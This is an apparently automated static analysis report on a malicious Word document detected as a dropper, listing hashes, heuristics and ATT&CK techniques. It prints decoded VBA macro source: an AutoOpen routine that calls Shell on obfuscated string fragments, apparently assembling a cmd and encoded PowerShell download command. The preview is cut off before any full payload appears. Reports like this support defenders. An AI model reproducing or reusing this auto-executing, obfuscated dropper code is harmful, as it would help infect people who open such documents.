Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 278f558786fef1ee…

MALICIOUS

Office (OLE)

Size: 110.6 KB
Created: 2018-08-15 23:06:00
Authoring application: Microsoft Office Word
First seen: 2018-08-26
MD5: 85fc7b559b44778ba117245ad70fc8ff
SHA-1: 2f9c2119c07e39d894aee89aa939c8a005be901a
SHA-256: 278f558786fef1ee2845de6b558fcd7dc6034b5ffe84e67010a7cb968eedc718
Risk Score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The specific command constructed appears to be obfuscated but likely involves downloading and executing a secondary payload. The ClamAV detection 'Doc.Dropper.Valyria-6668100-0' further supports its role as a dropper.

Heuristics (6)

  • ClamAV: Doc.Dropper.Valyria-6668100-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6668100-0
  • VBA macros detected (severity: medium, 2 related findings, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical, rule: OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium, rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14202 bytes
SHA-256: 9779615afe179ae64c54b75b5578480d116b6d5927941a35de6823b5a37d3160
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "DlLVColizzEq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   Hour Sqr(hMJhB)
   Hour 40
   Error Atn(1)
   Error CCur(VIPhP)
   Hour 1
Shell# KeyString(YQiHlQDabKGSip + rLEJMjPkO + vbKeyC + BfqwbsiPzNwaK + tJdCwXsPJ) + RksBtsjXCvkLfa + TDtltPwnFH + UBitRZz + KiiqiSjUM + PRPpATiF + wnwiWApmPz + USmDi + DBaDmYW + jmWXDlSD + bkfPGcdQdC + ZGwWjtArm + hwzNpMAwDQ + jwjYHi + lLtmw + UFtnsSIzwcuwYL + FCmEvmhZCtfDwC, 449784644 - 449784644
   Hour CDate(BXjnr)
   Error 8
End Sub


Attribute VB_Name = "iHJjMWjDQSX"
Function UBitRZz()
On Error Resume Next
Error Str(60383 * 74581 + aFqLTl / 26537)
   Error 1085
sHYzaHwjTjj = "mD " + " " + " " + " " + "/" + "v" + ":oN" + "  " + " " + "   "
Hour CStr(ozlBQr)
   Error TimeValue(1)
jKlpHQ = "   " + " " + "  " + " " + " " + " " + " " + " " + "/c"
Hour 9
   Hour 508
bJFviRjvGM = "  " + "  " + " " + "  " + "  " + " " + "   " + " " + CStr(Chr(LnGTBXAUOVvCP + LJFUYMwQb + 34 + KROPikP + jrzkPnSziDJil)) + " " + " "
Hour CDbl(Chjzmf / qmsts)
   Error Int(587)
iiziz = "s" + "E" + "t " + " } " + " "
Hour Hex(PTEsFO - bwfAu)
   Error Round(7)
odJilONhX = "=/o" + ",e" + "r-}" + "ell" + "h`e" + "hJA" + "B" + "DA" + "G0" + "AY" + "QA"
Error Cos(100)
   Error 48
SwoVLRRkkZL = "'" + "AG4" + "AZ" + "Q" + "B" + "3" + "AC" + "0"
Error FJCrf
   Error CDec(33)
   Hour TimeValue(EOCcRo + FsIki)
jGpdSozEn = "Ab," + "BiA" + "G" + "oAZ" + "QBj" + "A;" + "Q" + "AI" + "A"
Hour RMBjpu
   Error LCase(10409 - HfWZU / aYZAGv + 2002)
   Error 770
tCVOjs = "B\A" + "G2" + "AdA" + "A" + "uAF" + "c" + "AZQ" + "Bi" + "AE" + "M"
UBitRZz = sHYzaHwjTjj + jKlpHQ + bJFviRjvGM + iiziz + odJilONhX + SwoVLRRkkZL + jGpdSozEn + tCVOjs
   Hour LEQca
   Hour CVar(62)
End Function
Function KiiqiSjUM()
On Error Resume Next
Error vOjbSk
   Error 8
   Error 431
iGiGruBdAN = "Ab" + "A" + "B/" + "A" + "G" + "2Ab" + "gB0"
Error LNNMW
   Error TEsaRO
   Hour CByte(96)
wYPPWqSo = "AD" + "-" + "A" + "JA" + "B" + "1AF"
Error 6
   Hour 99
   Hour Sqr(632)
QLLmTkGYOJi = "AAR" + "QA" + "'" + "A" + "Cc" + "AwA" + "B0A" + ";Q" + "Ac" + "AA" + "6AC" + "8A$"
Hour CDate(93077 * nXfiCf)
   Hour Tan(3891)
WpqFKU = "," + "Bi" + "A" + ";" + "IAw" + "QBn" + "AGg" + "Ad" + "ABv" + "AG4" + "AwA"
Hour tjcBh
   Error Int(jfjHMq)
   Hour 319432244
THFzc = "B" + "vA;" + "Y" + "AZQ" + "BjA" + "G" + ",AZ" + "Q" + "B}A"
Error Int(5)
   Error 379512492
mJkqfiPJPHj = "G4" + "AZ" + "QBy" + "A;M" + "A$g" + "BjA" + "G" + "8A" + "bQ"
Error Sqr(BhXQU + mLvAFH)
   Hour Sgn(859)
   Hour Val(jnBLSk)
kvAzBci = "AvA" + "D" + "AA" + "ZAB" + "GA" + "GkA" + "ZQ" + "B3A" + "E" + "AA" + "wA" + "B0A"
Error 256125246
   Error Fix(24427 * mqvvK)
iGriOndA = ";Q" + "AcA" + "A" + "6A" + "C8A" + "$," + "Bn" + "A" + "G" + "E"
Error ZBzjXu
   Error YhzMq
ikXqGavvMpo = "Aw" + "Q" + "B-A" + "G" + "8A" + "bg" + "Bn"
Error Rnd(WqpEZ)
   Error Int(2211)
KwdXXPEi = "AC" + "4" + "Ab" + "g" + "B" + "l" + "A;Q" + "A" + "$," + "B;" + "A"
Hour Cos(mpsFkj + LwTcI)
   Hour Str(7557 + dzqBod / rEvjaK / XLlpd)
rlvcijiF = ";c" + "ATQ" + "B5A" + "EA" + "AwA" + "B"
Error CDec(570)
   Error Int(428575136)
   Error Log(IGbDzL)
dIuBmm = "0A;" + "QA" + "cAA" + "6" + "AC8" + "A" + "$,B" + "rA"
Error mrKww
   Error XStoZ
SnGEqAcsvrv = "G" + "4A" + "b," + "B3" + "AGk" + "A" + "bg"
KiiqiSjUM = iGiGruBdAN + wYPPWqSo + QLLmTkGYOJi + WpqFKU + THFzc + mJkqfiPJPHj + kvAzBci + iGriOndA + ikXqGavvMpo + KwdXXPEi + rlvcijiF + dIuBmm + SnGEqAcsvrv
   Hour 42
   Hour Sin(57135 * FcGSwE + 52046 / lhXUom)
End Function
Function PRPpATiF()
On Error Resume Next
Hour Sqr(16449 - 1338)
   Error CDate(4895)
zTUcVcR = "BnA" + "GE" + "AZg" + "By" + "AGk" + "AY" + ",B" + "}AC" + "4" + "Ab"
Hour LCase(1)
   Hour Log(6)
   Error 198
GDfrld = "," + "B" + "y" + "AGc" + "A" + "$" + ",B
... (truncated)